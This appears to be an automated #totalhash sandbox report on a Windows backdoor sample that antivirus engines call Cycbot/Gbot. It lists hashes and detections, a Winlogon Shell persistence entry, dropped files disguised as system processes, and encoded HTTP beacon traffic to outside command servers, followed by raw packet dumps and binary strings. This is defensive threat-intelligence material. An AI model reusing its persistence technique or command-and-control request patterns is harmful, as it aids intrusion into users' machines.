Analysis | #totalhash

Analysis Date	2014-11-20 15:43:04
MD5	8140dd3febfec1c819e28f6aa65e0455
SHA1	887562704cd3c7988be8e86ebeb4b5534b6ce8e7

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 8a2745d53daf5d2b7bad8c609b1c5702 sha1: dfd65c2fe5bced2c7c2213aa6d3626d85576d713 size: 114688
Section	.tls md5: 0778bee6f0e10a72d16ee5a105c77f11 sha1: 94b78cb4c2bf806848e01465c0d52cef35546ed5 size: 1024
Section	.data md5: 220e19c69d22b5ebb585f3a2e82e61b5 sha1: 55acd5c294dc3fb61d7584d1593d68066df7dc0e size: 67072
Section	.reloc md5: a6272144641beacb67877be8b8a56489 sha1: 54796189c425f728012011c6f8fe8fbff6bd857e size: 1024
Timestamp	2005-11-29 07:48:07
PEhash	4752779d3fc50723abe0046462552b4130c79d68
IMPhash	00eb14c30da1e3b4a24f2c4f39ffc693
AV	360 Safe	Gen:Heur.Conjar.5
AV	Ad-Aware	Gen:Heur.Conjar.5
AV	Alwil (avast)	Cybota [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Goolbot.K.gen!Eldorado
AV	Avira (antivir)	TR/Crypt.XPACK.Gen8
AV	BullGuard	Gen:Heur.Conjar.5
AV	CA (E-Trust Ino)	Win32/FakeAlert.J!generic
AV	CAT (quickheal)	Backdoor.Cycbot.B
AV	ClamAV	Trojan.Gbot-453
AV	Dr. Web	BackDoor.Gbot.70 - infected, incurable
AV	Emsisoft	Gen:Heur.Conjar.5
AV	Eset (nod32)	Win32/Kryptik.SRP
AV	Fortinet	W32/Kryptik.SMY!tr.bdr
AV	Frisk (f-prot)	W32/Goolbot.K.gen!Eldorado
AV	F-Secure	Gen:Heur.Conjar.5
AV	Grisoft (avg)	Win32/Cryptor
AV	Ikarus	Backdoor.Win32.Cycbot
AV	K7	Backdoor ( 003210941 )
AV	Kaspersky	Backdoor.Win32.Gbot.odl
AV	MalwareBytes	Backdoor.Bot
AV	Mcafee	BackDoor-EXI.gen.n
AV	Microsoft Security Essentials	Backdoor:Win32/Cycbot.G
AV	MicroWorld (escan)	Gen:Heur.Conjar.5
AV	Norman	Gen:Heur.Conjar.5
AV	Rising	Backdoor.Win32.Cycbot.a
AV	Sophos	Mal/FakeAV-IS
AV	Symantec	Backdoor.Cycbot!gen7
AV	Trend Micro	BKDR_CYCBOT.SME3
AV	VirusBlokAda (vba32)	BScope.DeadCryptor.01597

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	PIPE\lsarpc
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex	{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex	{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex	{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex	{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex	{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS	127.0.0.1
Winsock DNS	yourvideoportal.com
Winsock DNS	onlinemediaresource.com
Winsock DNS	psfk.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process	C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS	psfk.com Type: A 72.10.50.52
DNS	onlinemediaresource.com Type: A 54.208.78.194
DNS	zonedg.com Type: A 141.8.225.80
DNS	zonedg.com Type: A 141.8.225.80
DNS	yourvideoportal.com Type: A 54.209.168.250
HTTP GET	http://psfk.com/img/icons/twitter.png?v16=12&tq=gJ4WK%2FSUh%2FTNhRMw9YLJ%2BMSTUivqg4b0zZpEfqHXarVJ%2BQhhAAQ%3D User-Agent: mozilla/2.0
HTTP GET	http://onlinemediaresource.com/blog/images/3521.jpg?v55=6&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917V65rJqlLfgPiWW1cg User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwlKv975Xlm5G User-Agent: mozilla/2.0
HTTP GET	http://yourvideoportal.com/blog/images/3521.jpg?v13=64&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917X65rJqlLfgPiWW1cg User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G User-Agent: mozilla/2.0
Flows TCP	192.168.1.1:1031 ➝ 72.10.50.52:80
Flows TCP	192.168.1.1:1032 ➝ 54.208.78.194:80
Flows TCP	192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1036 ➝ 54.209.168.250:80
Flows TCP	192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap

0x00000000 (00000)   47455420 2f696d67 2f69636f 6e732f74   GET /img/icons/t
0x00000010 (00016)   77697474 65722e70 6e673f76 31363d31   witter.png?v16=1
0x00000020 (00032)   32267471 3d674a34 574b2532 46535568   2&tq=gJ4WK%2FSUh
0x00000030 (00048)   25324654 4e68524d 7739594c 4a253242   %2FTNhRMw9YLJ%2B
0x00000040 (00064)   4d535455 69767167 3462307a 5a704566   MSTUivqg4b0zZpEf
0x00000050 (00080)   71485861 72564a25 32425168 68414151   qHXarVJ%2BQhhAAQ
0x00000060 (00096)   25334420 48545450 2f312e30 0d0a436f   %3D HTTP/1.0..Co
0x00000070 (00112)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000080 (00128)   0a486f73 743a2070 73666b2e 636f6d0d   .Host: psfk.com.
0x00000090 (00144)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000a0 (00160)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000b0 (00176)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7635 353d3626   /3521.jpg?v55=6&
0x00000020 (00032)   74713d67 4b5a4574 7a794d76 35724a71   tq=gKZEtzyMv5rJq
0x00000030 (00048)   7847314a 3432707a 4d666642 76557230   xG1J42pzMffBvUr0
0x00000040 (00064)   2532426a 62777667 53393137 56363572   %2BjbwvgS917V65r
0x00000050 (00080)   4a716c4c 66675069 57573163 67204854   JqlLfgPiWW1cg HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   206f6e6c 696e656d 65646961 7265736f    onlinemediareso
0x00000090 (00144)   75726365 2e636f6d 0d0a4163 63657074   urce.com..Accept
0x000000a0 (00160)   3a202a2f 2a0d0a55 7365722d 4167656e   : */*..User-Agen
0x000000b0 (00176)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7631 333d3634   /3521.jpg?v13=64
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42765572   qxG1J42pzMffBvUr
0x00000040 (00064)   30253242 6a627776 67533931 37583635   0%2BjbwvgS917X65
0x00000050 (00080)   724a716c 4c666750 69575731 63672048   rJqlLfgPiWW1cg H
0x00000060 (00096)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x00000070 (00112)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000080 (00128)   3a20796f 75727669 64656f70 6f727461   : yourvideoporta
0x00000090 (00144)   6c2e636f 6d0d0a41 63636570 743a202a   l.com..Accept: *
0x000000a0 (00160)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000b0 (00176)   6d6f7a69 6c6c612f 322e300d 0a0d0a20   mozilla/2.0.... 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 64793e0a   n: close....dy>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

Strings

.
.
.
 
080904b0
1.0.0.1
1117
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
```````````````
`^*``$
^^^^^^^
^^^^^^^^^^^^_______
~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
                                                                             
,,,,,,,,,,,,,,,,,,,,,,,,
;;;;;;;;;;;;;;;;
::::::
::::::::
:::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::
!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!
?????????????????????
?????????????????????????????????????????????
////////////////////////////////////////////////
''''''''''
"""""""""""""""""""""""""""""""""""""
[[[[[[[[[[[[[[[[[[[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
]'{]{^
{{{{{{{{{{{{
}}}}}}}}}}}}}
}}}}}}}}}}}}}}}
$$$$$$$$$
********************
& `,`@.
&  & @
&&&&&&
########################
##########################=
++++++++
0000000000000000000000000000000000
0000jjjjjjjj
&,00PG@
",_0aP
0OvYjJ6
0T0v6D6
0YO^s\
 @1%^^
1111111111111111111
1*H2N@
2}20R `
$@ 29^E
2DL~fE
[2hHrZ0
``2}J!
333333333333333333ddddddddddddddddddddddddddddddddddddddddddddddff
333333333344IIIIIIIIIII
3~"`@Cq
*'3\`m
3_^n^x
-3YlBe
`[4;~>D
4GdeLZ$ 
4jZI& 
[4lV-s_
4pV7Kr
5,_0bg
55555555555nnnnnnnnnn
55a8)Y/	*
55yV6(
57s1))
58o$Q[
5j?&` R
5"@n]/
5+rR} ``
$6h+|D`
6-P4gZ
@$<6[y
`@7&` 
_^7QfI
, @}8'
8$@`	<
	]8'5V
((((((((((((((((((((888888
888888888
@,  8C. 
$	[8~D
$@@9],
99999999999999
9-a3I)J
9bi0z5
9D/uto
9\s m\
A2X7y,
~A87}fw
+a9f]8
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ac2z`C8
ADVAPI32.dll
a^fg( 
`A* `qF
avFt{6
A!`w*8
aY]a#t
` 	b179
B2Q$0Z
`B|9<g
`BDCa"
b"{ob7
,@@B>P
 `#=bR
bwh.dll
bYBlUb
bz{#N%
C@'&@ 
"C1}{i
ccccccccccccccccccccccccccccccccccccccchhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
 Cf@@=
!C{\Me
CreateProcessA
*cy3B}
@.data
{*@@Db
,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
$`@{Dk
@d>=mE
Dq^W5H
dT&`  `
DTW^'8
@>E%a~42
E'g=A;
eI(!&p58s[
(@@Elr!
EnumResourceNamesW
?	e`Nz
E|rBH'
<E/u, 
e!v2|5G~tI~7C
e'W>-;
Ex%,o3
Ey/ ``
ey;OR8
*f7;)[+
F{BOiq
FFFFFF
fffffffffffff
ffffffffffffff
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
."f/F%n/
\Fnj)*I
fO4iA3w
F !sb!
>*@ fV
@F<X<d_. 
g	1#rI
/gdTX 
GetSystemTimeAsFileTime
gOb~HG33
G~S>")I
.G/sNw
 Gv5:8
GW|$ `
^h2r,V
h>^4ZMrA
h|9&@ 
Hf2Wbh$
`@hG_O
HhF;+"
hhhhhhhhhhhh
 @hpG. @
. `h_QW
h*`@TU<
H']~UT
 `i,  
/i=a1a]
iaxs[)x7
Ibxv6vl
idJNGFx
-#IHX*-0[
iiiiiiiiiiiii
iiiiiiiiiiiiiiiiiii
'ij>hZ-
I		N94
InterlockedExchange
iOZ, `
?  @i#W
J3g8{t
j3M\8u
^=J8=&
jjj															
JJJJJJJJJJJJJJ
JKh=P4
jO}FX+
jrs>uS
J"*VtB+r+
JxGm `
jz6H*`
` K^'>=
K2:dP*Rh
 `K7H%#
].k|99
?Kdk2'
KERNEL32.dll
kfbf&ah
kM9*SO
kQt@_EL
~KS28;
KSoN.%
@ K}u@
/]l$`@"
L' @`@
L0shxq
~L1=r4
\L"!24(cf`n
$`@lbZ
Limgs_r
lKI"`@]F
llllllllllllllleeeeeeee
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
llllllllllloooooooo
%.L<nPl_
LocalAlloc
lstrlenA
|L!T^%@
lX3 \!n
M1o;Ih
M4K'<Q5<
M:fCms
[Mf*sE
m$H-`W
m ``jh?
mmmmmmmmmmmfffffffffffffffffffffffffffffffffffffffffffu
mmmmmmmmmmmmmmm
mmmmmmmmmmmmmmmmm
MP[\iH'
MPRAPI.dll
MprConfigGetFriendlyName
MprConfigServerConnect
MprConfigServerDisconnect
msi9ke#:OM4}	i
MultiByteToWideChar
/M=v5q
(@@mwa2
'mY;oA
MyRZbr
N:&`@&
NdrFixedArrayFree
n$@`Ft+
nnnnnnnnnnn
n-/PvWr
nSP01,
N.zAQy
O57>%0
o_Cyi1
 +Od@l-r7B
-o:l}p
o&` m]
@@/o+O
oooooooooooooooooooooooo
OpenWaitableTimerW
 `oT`B
o%UQSfs
`?ov,-8
,@ P%/
PathFileExistsW
@@;p`D
P+F+3PP
pidTJq
PPPPPPPPP
PPPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPPPPPPPPPPPPPP
PzT'* 
q^CQo2>
qfsRfS
 Q[h}L
``#Q	l
`@Q~nH
`@QOYn
{q[q?=
QQ5Qkj
qqqqqqqqqq
qQuBsD
q R:a}
Q[XTn.
r4['^0{
(R:6GrS<
r8= ` G
RaiseException
rB*@@"
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
R*&FbvS
R%$*k[4
{R^:k6j
RPCRT4.dll
Rqdf'r
rrrrrr```````
RRRRRRRRR
RRRRRRRRRRRRRRRRlllllllllllllllllllllllllllllllllllllll
 @RS	`B
&r%SR1
RS#W{"
s+	@#/
/sb, @
s~`BMov
 sC'"@
`SdC*@`j
SHLWAPI.dll
S	I9K9U
@`sJHMg
sJobx7
+sMtY4g
	[spSR
SSSSSSS
sssssssssssCCCCCCC
SSSSSSSSSSSSSSSSSSS
t2X^n-
T3}	1W
Tb]></
!This program cannot be run in DOS mode.
tI@KFe
` =Tj-G
*to2iP/~Ij
tttttt
TTTTTTTTTTTTTTTTT55
TTTTTTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTTTTTTTT
tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt
|.@@U	
u!]+8X4
uAVZ{15x
Ub\Y2\
"@ UD9
;uH/3/
uj()5QE
\U%'nv
UuidCreate
%uzAQ_
V`9FcT(
VA")GX
?v" @hL
VirtualAllocEx
~VJdhZ+Ib
VjUC/h"
`@vJZQ
:?\`/Vm
vN;DSqCy
:Vqqr~
Vr8t;N
]]]]]]]]]]]]]VVVVVVVVVVV                   
@>VxS0
; `@W$@
W|8P[q
